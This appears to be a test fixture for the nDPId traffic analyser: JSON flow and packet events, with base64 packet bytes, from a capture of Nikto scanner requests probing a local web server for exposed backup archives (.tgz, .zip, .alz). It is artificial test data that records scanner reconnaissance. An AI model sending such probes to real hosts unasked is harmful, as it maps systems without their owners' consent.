-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":330,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277201,"flow_last_seen":1576420277201,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277201,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50204,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":330,"flow_packet_id":1,"flow_last_seen":1576420277201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277201,"pkt":"AAAAAAAAAAAAAAAACABFAADFz59AAEAGbJF\/AAABfwAAAcQcH5D4h\/cKGx\/I\/4AYAED+uQAAAQEICp1m\/PmdZvz5R0VUIC8xMjcuMC4wLjEudGd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":330,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277201,"flow_last_seen":1576420277201,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277201,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50204,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":331,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277203,"flow_last_seen":1576420277203,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277203,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50206,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":331,"flow_packet_id":1,"flow_last_seen":1576420277203,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277203,"pkt":"AAAAAAAAAAAAAAAACABFAADBfg5AAEAGviZ\/AAABfwAAAcQeH5A6WEaZ3wpBiYAYAED+tQAAAQEICp1m\/PudZvz7R0VUIC8xMjcwMC56aXAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":331,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277203,"flow_last_seen":1576420277203,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277203,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50206,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":332,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277204,"flow_last_seen":1576420277204,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277204,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50208,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":332,"flow_packet_id":1,"flow_last_seen":1576420277204,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277204,"pkt":"AAAAAAAAAAAAAAAACABFAADBsIBAAEAGi7R\/AAABfwAAAcQgH5BX0ojsod\/7v4AYAED+tQAAAQEICp1m\/PydZvz8R0VUIC8xMjcwMC56aXAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":332,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277204,"flow_last_seen":1576420277204,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277204,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50208,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":333,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277206,"flow_last_seen":1576420277206,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277206,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50210,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":333,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":1,"flow_last_seen":1576420277206,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277206,"pkt":"AAAAAAAAAAAAAAAACABFAADEp6FAAEAGlJB\/AAABfwAAAcQiH5DXnp8L7+WKyYAYAED+uAAAAQEICp1m\/P6dZvz+R0VUIC8xMjcwLnRhci5iejIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277206,"flow_last_seen":1576420277206,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277206,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50210,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":334,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277207,"flow_last_seen":1576420277207,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277207,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50212,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":334,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":1,"flow_last_seen":1576420277207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277207,"pkt":"AAAAAAAAAAAAAAAACABFAADELblAAEAGDnl\/AAABfwAAAcQkH5A1yBUjW63h5IAYAED+uAAAAQEICp1m\/P+dZvz\/R0VUIC8xMjcwLnRhci5iejIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":334,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277207,"flow_last_seen":1576420277207,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277207,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50212,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":335,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277209,"flow_last_seen":1576420277209,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277209,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50214,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":1,"flow_last_seen":1576420277209,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277209,"pkt":"AAAAAAAAAAAAAAAACABFAADDSgRAAEAG8i5\/AAABfwAAAcQmH5DZEXKVufuNq4AYAED+twAAAQEICp1m\/QCdZv0AR0VUIC8xMjcuMC4wLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":335,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277209,"flow_last_seen":1576420277209,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277209,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50214,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":336,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277210,"flow_last_seen":1576420277210,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277210,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50216,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":336,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":336,"flow_packet_id":1,"flow_last_seen":1576420277210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277210,"pkt":"AAAAAAAAAAAAAAAACABFAADDtt9AAEAGhVN\/AAABfwAAAcQoH5DVr45M6gY7v4AYAED+twAAAQEICp1m\/QKdZv0CR0VUIC8xMjcuMC4wLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":336,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277210,"flow_last_seen":1576420277210,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277210,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50216,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":337,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277211,"flow_last_seen":1576420277211,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277211,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50218,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":337,"flow_packet_id":1,"flow_last_seen":1576420277211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277211,"pkt":"AAAAAAAAAAAAAAAACABFAAC9XspAAEAG3W5\/AAABfwAAAcQqH5Bdf2ZfE+bMgYAYAED+sQAAAQEICp1m\/QOdZv0DR0VUIC8wLnRneiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":337,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277211,"flow_last_seen":1576420277211,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277211,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50218,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":338,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277213,"flow_last_seen":1576420277213,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277213,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50220,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":338,"flow_packet_id":1,"flow_last_seen":1576420277213,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277213,"pkt":"AAAAAAAAAAAAAAAACABFAAC9v\/9AAEAGfDl\/AAABfwAAAcQsH5CYPYdrmayyCIAYAED+sQAAAQEICp1m\/QWdZv0FR0VUIC8wLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277213,"flow_last_seen":1576420277213,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277213,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50220,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":339,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277215,"flow_last_seen":1576420277215,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277215,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50222,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":339,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":339,"flow_packet_id":1,"flow_last_seen":1576420277215,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277215,"pkt":"AAAAAAAAAAAAAAAACABFAADCrDVAAEAGj\/5\/AAABfwAAAcQuH5DnZJSlMCY5doAYAED+tgAAAQEICp1m\/QedZv0GR0VUIC9iYWNrdXAuYWx6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":339,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277215,"flow_last_seen":1576420277215,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277215,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50222,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":340,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277216,"flow_last_seen":1576420277216,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277216,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50224,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":340,"flow_packet_id":1,"flow_last_seen":1576420277216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277216,"pkt":"AAAAAAAAAAAAAAAACABFAADC6alAAEAGUop\/AAABfwAAAcQwH5AB5dFAi0ifwYAYAED+tgAAAQEICp1m\/QidZv0IR0VUIC9iYWNrdXAuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277216,"flow_last_seen":1576420277216,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277216,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50224,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 